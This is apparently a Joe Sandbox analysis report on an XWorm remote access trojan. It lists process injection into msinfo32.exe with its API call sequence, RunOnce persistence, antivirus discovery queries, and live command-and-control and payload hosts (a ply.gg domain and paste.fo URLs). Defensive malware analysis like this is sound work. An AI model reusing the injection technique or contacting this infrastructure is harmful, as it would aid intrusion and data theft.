Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B64AA1 LoadLibraryA,LoadLibraryA,CreateProcessA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,memset,InternetOpenA,InternetOpenUrlA,InternetReadFile,memset,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memset,RtlDeleteBoundaryDescriptor,VirtualAllocEx,WriteProcessMemory,QueueUserAPC,ResumeThread,SetLastError,GetModuleFileNameW,GetLastError,GetLastError,CopyFileExW,RtlRestoreThreadPreferredUILanguages,RtlDeleteBoundaryDescriptor,GetLastError,GetLastError,		3_2_00B64AA1

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Thread created: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe EIP: 216804F0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Thread created: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe EIP: 216804F0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Thread created: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe EIP: 216804F0	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe

Thread APC queued: target process: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Memory written: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe base: 1AA10C70000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Memory written: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe base: 7FFE0C5B38C0	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Memory written: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe base: 7FFE221BF1F0	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Memory written: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe base: 1AA11010000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Memory written: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe base: 204FBB00000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Memory written: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe base: 7FFE0C5B38C0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Memory written: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe base: 7FFE221BF1F0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Memory written: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe base: 204FD660000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Memory written: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe base: 27ADD210000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Memory written: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe base: 7FFE0C5B38C0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Memory written: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe base: 7FFE221BF1F0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Memory written: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe base: 27ADED60000	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Process created: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe "C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Process created: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe "C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Process created: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe "C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe"	Jump to behavior

Source: msinfo32.exe, 00000002.00000002.4156949853.000001AA12E3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: msinfo32.exe, 00000002.00000002.4156949853.000001AA12E3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: msinfo32.exe, 00000002.00000002.4156949853.000001AA12E3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: msinfo32.exe, 00000002.00000002.4156949853.000001AA12E3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
Source: msinfo32.exe, 00000002.00000002.4156949853.000001AA12E3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager2b

Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe

Code function: 0_2_002D45F0 cpuid

0_2_002D45F0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe

Code function: 0_2_002D2D30 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_002D2D30

Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: msinfo32.exe, 00000002.00000002.4156434083.000001AA10DF0000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000002.00000002.4156434083.000001AA10DF7000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000002.00000002.4157386528.000001AA2B1F0000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 11.2.msinfo32.exe.27adee40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.msinfo32.exe.1aa12890000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.msinfo32.exe.27adee40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.msinfo32.exe.27adef2d008.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.msinfo32.exe.204fd720000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.msinfo32.exe.2048000d008.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.1976262296.0000027ADEE40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1897725884.00000204FD720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1976311824.0000027ADEF21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4156799723.000001AA12890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1896700546.0000020480001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msinfo32.exe PID: 7012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: msinfo32.exe PID: 6888, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: msinfo32.exe PID: 908, type: MEMORYSTR

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 11.2.msinfo32.exe.27adee40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.msinfo32.exe.1aa12890000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.msinfo32.exe.27adee40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.msinfo32.exe.27adef2d008.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.msinfo32.exe.204fd720000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.msinfo32.exe.2048000d008.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.1976262296.0000027ADEE40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1897725884.00000204FD720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1976311824.0000027ADEF21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4156799723.000001AA12890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1896700546.0000020480001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msinfo32.exe PID: 7012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: msinfo32.exe PID: 6888, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: msinfo32.exe PID: 908, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	712 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Registry Run Keys / Startup Folder	1 Disable or Modify Tools	LSASS Memory	321 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	231 Virtualization/Sandbox Evasion	Security Account Manager	231 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	712 Process Injection	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	21 Obfuscated Files or Information	Cached Domain Credentials	14 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	25%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	25%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
paste.fo	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://docs.rs/getrandom#nodejs-es-module-support/rustc/64ebd39da5ec28caa3bd7cbb3f22f5949432fe2b	0%	Virustotal		Browse
cameras-commitment.gl.at.ply.gg	0%	Avira URL Cloud	safe
https://paste.fo/raw/9c15a0ff5499j~	0%	Avira URL Cloud	safe
https://docs.rs/getrandom#nodejs-es-module-support/rustc/64ebd39da5ec28caa3bd7cbb3f22f5949432fe2b	0%	Avira URL Cloud	safe
https://paste.fo/raw/9c15a0ff5499e	0%	Avira URL Cloud	safe
https://paste.fo/raw/9c15a0ff5499G	0%	Avira URL Cloud	safe
https://paste.fo/raw/9c15a0ff5499#=	0%	Avira URL Cloud	safe
https://paste.fo/raw/9c15a0ff5499IUr	0%	Avira URL Cloud	safe
https://paste.fo/raw/9c15a0ff5499D	0%	Avira URL Cloud	safe
https://paste.fo/raw/9c15a0ff5499XN&b	0%	Avira URL Cloud	safe
https://paste.fo/raw/9c15a0ff5499t(X?	0%	Avira URL Cloud	safe
https://paste.fo/	0%	Avira URL Cloud	safe
https://paste.fo/raw/9c15a0ff5499=)	0%	Avira URL Cloud	safe
https://paste.fo/raw/9c15a0ff5499	0%	Avira URL Cloud	safe
https://paste.fo/raw/9c15a0ff5499#=	0%	Virustotal		Browse
https://paste.fo/jH	0%	Avira URL Cloud	safe
https://paste.fo/raw/9c15a0ff5499	0%	Virustotal		Browse
https://paste.fo/	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cameras-commitment.gl.at.ply.gg	147.185.221.16	true	true		unknown
paste.fo	104.21.28.76	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
cameras-commitment.gl.at.ply.gg	true	Avira URL Cloud: safe	unknown
https://paste.fo/raw/9c15a0ff5499	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://paste.fo/raw/9c15a0ff5499G	FRpl.exe, 00000003.00000002.1864510706.000002806A7F6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://paste.fo/raw/9c15a0ff5499j~	SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe, 00000000.00000003.1718040937.0000025E70A62000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe, 00000000.00000003.1718458434.0000025E70A6D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docs.rs/getrandom#nodejs-es-module-support/rustc/64ebd39da5ec28caa3bd7cbb3f22f5949432fe2b	SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe, FRpl.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://paste.fo/raw/9c15a0ff5499e	FRpl.exe, 00000003.00000002.1864510706.000002806A78F000.00000004.00000020.00020000.00000000.sdmp, FRpl.exe, 00000009.00000002.1943889827.00000282C4FE7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://paste.fo/raw/9c15a0ff5499#=	FRpl.exe, 00000003.00000002.1864510706.000002806A7F6000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://paste.fo/raw/9c15a0ff5499D	FRpl.exe, 00000009.00000002.1943889827.00000282C506C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://paste.fo/raw/9c15a0ff5499IUr	FRpl.exe, 00000009.00000002.1943889827.00000282C4FE7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://paste.fo/raw/9c15a0ff5499XN&b	FRpl.exe, 00000003.00000002.1864510706.000002806A7A9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://paste.fo/raw/9c15a0ff5499t(X?	FRpl.exe, 00000009.00000002.1943889827.00000282C5026000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://paste.fo/	SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe, 00000000.00000002.1721562376.0000025E70A29000.00000004.00000020.00020000.00000000.sdmp, FRpl.exe, 00000003.00000002.1864510706.000002806A7F6000.00000004.00000020.00020000.00000000.sdmp, FRpl.exe, 00000009.00000002.1943889827.00000282C506C000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	msinfo32.exe, 00000002.00000002.4156949853.000001AA12B31000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://paste.fo/raw/9c15a0ff5499=)	SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe, 00000000.00000002.1721562376.0000025E70A29000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://paste.fo/jH	SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe, 00000000.00000002.1721562376.0000025E70A29000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
147.185.221.16	cameras-commitment.gl.at.ply.gg	United States		12087	SALSGIVERUS	true
104.21.28.76	paste.fo	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1489770
Start date and time:	2024-08-08 02:35:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@12/3@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 116 Number of non-executed functions: 95
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
01:36:05	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 9Q9QTPMV20RVO8c4 C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe
01:36:14	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce 9Q9QTPMV20RVO8c4 C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe
20:36:04	API Interceptor	16288750x Sleep call for process: msinfo32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
147.185.221.16	Build.exe	Get hash	malicious	RedLine	Browse	medical-m.gl.at.ply.gg:6677/IRemotePanel
147.185.221.16	4JL966sxM4.exe	Get hash	malicious	RedLine	Browse	jul-nelson.gl.at.ply.gg:47198/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
paste.fo	confirmationcr.vbs	Get hash	malicious	Redline Clipper	Browse	104.21.70.240
	9K25QyJ4hA.exe	Get hash	malicious	Unknown	Browse	104.21.70.240
	9K25QyJ4hA.exe	Get hash	malicious	Unknown	Browse	104.21.70.240

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SALSGIVERUS	185.196.11.135-x86-2024-08-06T18_49_53.elf	Get hash	malicious	Mirai	Browse	147.176.119.167
	cougif6lqM.exe	Get hash	malicious	DCRat, XWorm	Browse	147.185.221.17
	killer.exe	Get hash	malicious	XWorm	Browse	147.185.221.18
	setup.exe	Get hash	malicious	XWorm	Browse	147.185.221.21
	msedge.exe	Get hash	malicious	AsyncRAT, VenomRAT	Browse	147.185.221.20
	z5F3uLmKBu.exe	Get hash	malicious	XWorm	Browse	147.185.221.20
	PMRpXCwamC.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	147.185.221.21
	dH3bcNSEKG.exe	Get hash	malicious	XWorm	Browse	147.185.221.20
	Vjy8d2EoqK.exe	Get hash	malicious	Blank Grabber, DCRat, XWorm	Browse	147.185.221.21
	FUDE.bin.exe	Get hash	malicious	XWorm	Browse	147.185.221.17
CLOUDFLARENETUS	http://guqtg.frooskivpn.com/4guusj15181vCAj1127elpjnhawbx14030EJAOJSTOQCIWNIN24527KYKP17651B16#l8054dcdz5aasx7h9lz4sls75gk825optascqsrhl95ahyhhm7	Get hash	malicious	Phisher	Browse	104.17.25.14
	https://1drv.ms/w/c/b1ff01bed9ea475d/IQProY0kjoYVQLqU9_kinT4XAa3BpLyE-M2L1U96jcTVk_c	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	https://dowld-sso--l-edger.webflow.io/	Get hash	malicious	Unknown	Browse	104.18.28.127
	https://pancakeswap-proclaim.us/	Get hash	malicious	Unknown	Browse	104.17.25.14
	http://cloudflare-ipfs.com/ipfs/bafkreifpoyvrphoiovn7hewptqfnvnciosy5ynzqpghzcad46hweedcpha	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	http://rewwerds-ff-garena.ru/	Get hash	malicious	Unknown	Browse	172.67.223.250
	https://ipfs.io/ipfs/bafkreifpoyvrphoiovn7hewptqfnvnciosy5ynzqpghzcad46hweedcpha	Get hash	malicious	HTMLPhisher	Browse	104.18.30.43
	http://cloudflare-ipfs.com/ipfs/bafkreigdmr3dab6hifnupc5d7wrdkfq7d2gjgmuhewowmlyufosov6ufge	Get hash	malicious	HTMLPhisher	Browse	104.17.64.14
	https://ipfs.io/ipfs/bafkreigdmr3dab6hifnupc5d7wrdkfq7d2gjgmuhewowmlyufosov6ufge	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse	104.18.11.207
	http://rewwerds-ff-garena.ru/freefire/	Get hash	malicious	Unknown	Browse	172.67.223.250

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	mgfo.dll	Get hash	malicious	Unknown	Browse	104.21.28.76
	mgfo.dll	Get hash	malicious	Unknown	Browse	104.21.28.76
	3d#U044f.lnk	Get hash	malicious	Unknown	Browse	104.21.28.76
	lt0Bl5kc0e.exe	Get hash	malicious	GuLoader	Browse	104.21.28.76
	MicrosoftEdgeUpdateTaskMachineCUA.VBS.vbs	Get hash	malicious	Unknown	Browse	104.21.28.76
	FySc2FzpA8.exe	Get hash	malicious	Go Injector	Browse	104.21.28.76
	FE89Nae47k.exe	Get hash	malicious	Vidar	Browse	104.21.28.76
	7zip_installer_d162802.exe	Get hash	malicious	Unknown	Browse	104.21.28.76
	Setup_20.1_win64.exe	Get hash	malicious	Vidar	Browse	104.21.28.76
	BrowserUpdater.lnk	Get hash	malicious	Unknown	Browse	104.21.28.76

Process:	C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	654
Entropy (8bit):	5.380476433908377
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5:	30E4BDFC34907D0E4D11152CAEBE27FA
SHA1:	825402D6B151041BA01C5117387228EC9B7168BF
SHA-256:	A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512:	89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe
File Type:	PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	354816
Entropy (8bit):	6.367150840935163
Encrypted:	false
SSDEEP:	6144:/GNiI1KTTWXe8D1LYWoNxQOlEJESR0HN98er80du7gZPqhHsETDdtlz42AVFAnS:/GNUuXnDNbIxQWMExt+ei7g9qW+J/eV2
MD5:	FF0BADEB5D6675C36D8F9068A1232258
SHA1:	7D287AD2BCDCE85532DEA445371A2D3C8295E516
SHA-256:	5B64CB5B788CCDD6006A7EDEFE6DCD1D36C9BF09101B53398E6A5938A1CC29C8
SHA-512:	DE4A382BF267C27279727F03A898B817E4B4058907FBAE384C4368CFE35BB0B8184CA8678DE3A426BDCE0D4D62027CC3A634FF0BE48549C0A32F9BEDE9365664
Malicious:	true
Antivirus:	Antivirus: Virustotal, Detection: 25%, Browse
Reputation:	low
